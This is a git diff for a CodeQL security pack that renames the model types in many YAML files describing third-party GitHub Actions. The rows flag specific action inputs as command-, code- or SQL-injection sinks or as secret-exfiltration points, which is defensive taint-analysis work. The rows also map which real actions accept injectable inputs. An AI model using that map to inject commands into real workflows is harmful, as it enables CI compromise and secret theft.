diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
index 0220f0d54d84..3a5b34880b95 100644
--- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
+++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml
index 9b36680af8f0..20abd5328727 100644
--- a/ql/lib/ext/actions_github-script.model.yml
+++ b/ql/lib/ext/actions_github-script.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["actions/github-script", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index fe3c3e58b5f9..dcc20433483f 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"]
 - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"]
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
index 41b67c2a625d..3afd9991e073 100644
--- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"]
 - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection", "manual"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
index 4d12a2936969..3deae2a9f197 100644
--- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"]
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml
index 7cb2e10e9267..7dd0459ab7f9 100644
--- a/ql/lib/ext/anchore_sbom-action.model.yml
+++ b/ql/lib/ext/anchore_sbom-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"]
 - ["anchore/sbom-action", "*", "input.format", "command-injection", "manual"]
diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml
index 83f09bc6bde5..721042aafaf0 100644
--- a/ql/lib/ext/anchore_scan-action.model.yml
+++ b/ql/lib/ext/anchore_scan-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml
index bdd8a8f77c9b..ee4dbaf2b55e 100644
--- a/ql/lib/ext/andresz1_size-limit-action.model.yml
+++ b/ql/lib/ext/andresz1_size-limit-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"]
 - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection", "manual"]
diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml
index 7e5f5c9ee6a4..76ae920d2550 100644
--- a/ql/lib/ext/android-actions_setup-android.model.yml
+++ b/ql/lib/ext/android-actions_setup-android.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"]
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
index 8daa9a9c2b33..46f667d75a01 100644
--- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
+++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"]
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
index 80502e487b83..4df6fe61a43f 100644
--- a/ql/lib/ext/asdf-vm_actions.model.yml
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
index 2a26d31feac7..aab329160ea1 100644
--- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
+++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
index 82e81f558166..610d188f0655 100644
--- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
+++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"]
 - ["ashley-taylor/regex-property-action", "*", "input.value", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml
index 58554eb3f612..b571bded8ca8 100644
--- a/ql/lib/ext/aszc_change-string-case-action.model.yml
+++ b/ql/lib/ext/aszc_change-string-case-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"]
 - ["aszc/change-string-case-action", "*", "input.replace-with", "output.uppercase", "taint", "manual"]
diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
index ca99210b4c2a..cd8f4f73e498 100644
--- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
+++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"]
 - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "secret.AWS_ACCESS_KEY_ID", "taint", "manual"]
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
index 1563d95b0b14..6ebc3875e07b 100644
--- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"]
 - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection", "manual"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
index 2bb6000355d6..2b2dbd014b7f 100644
--- a/ql/lib/ext/azure_powershell.model.yml
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
index b0c3419abe93..78b7eb1394c2 100644
--- a/ql/lib/ext/bahmutov_npm-install.model.yml
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
index cbe593690e44..0f146da2e0cb 100644
--- a/ql/lib/ext/blackducksoftware_github-action.model.yml
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"]
 - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection", "manual"]
diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml
index f29355d48827..483a3bf51727 100644
--- a/ql/lib/ext/bobheadxi_deployments.model.yml
+++ b/ql/lib/ext/bobheadxi_deployments.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
index 8463ed9577b4..e06e75f7a3bf 100644
--- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"]
 - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
index f20a877c3d28..d0a88ff31673 100644
--- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
index e0fe96ff9152..a29f84a55b5e 100644
--- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"]
 - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection", "manual"]
diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml
index a7489b686882..0e11fe45b42c 100644
--- a/ql/lib/ext/cachix_cachix-action.model.yml
+++ b/ql/lib/ext/cachix_cachix-action.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"]
 - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml
index c0a18c36465f..7e0970034a52 100644
--- a/ql/lib/ext/changesets_action.model.yml
+++ b/ql/lib/ext/changesets_action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
 - ["changesets/action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml
index 79ed7a80437c..2f62f211da9c 100644
--- a/ql/lib/ext/cloudflare_wrangler-action.model.yml
+++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
 - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection", "manual"]
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml
index 550b5b854ed7..f94ad242321d 100644
--- a/ql/lib/ext/coursier_cache-action.model.yml
+++ b/ql/lib/ext/coursier_cache-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
index bbe886112595..5872399881c5 100644
--- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
index 83b3bc3520df..02c5dcd3ccaa 100644
--- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml
index 3b0642fece44..45bf0c57355a 100644
--- a/ql/lib/ext/csexton_release-asset-action.model.yml
+++ b/ql/lib/ext/csexton_release-asset-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
index db55d3c6f3a8..4ac3492c41c3 100644
--- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
+++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
 - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection", "manual"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index a4539923b35f..a48da0cedfcc 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
index 462268636874..6ca7aa86c06d 100644
--- a/ql/lib/ext/dailydotdev_action-devcard.model.yml
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
 - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"]
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
index afe3e82ca1f6..11f1f10980fe 100644
--- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
index 5b0a9dab38d7..9ed2cb7908b8 100644
--- a/ql/lib/ext/daspn_private-actions-checkout.model.yml
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
 - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
index 35bbd72f0a4d..7f279f37a45d 100644
--- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
 - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index 472778d33b4b..68f434f4797a 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"]
diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml
index 1647e5607304..890a47c79fca 100644
--- a/ql/lib/ext/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
index bbdad8287dd3..aff5c3303165 100644
--- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
+++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
 - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"]
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
index f3ac66006d99..8f5e22fa2d96 100644
--- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e2289..ff0131da99e3 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc374236..1d82fb8f836f 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e1103..1e4cc21dd130 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] 
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a5121..ba729868a040 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ecd..504f0693977d 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d837742315..48267b6d0820 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f4..26eea1d2341b 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml 
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb1..7993d827fa6f 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d90..de48ea5a7092 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c8..36a9b24f0891 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file 
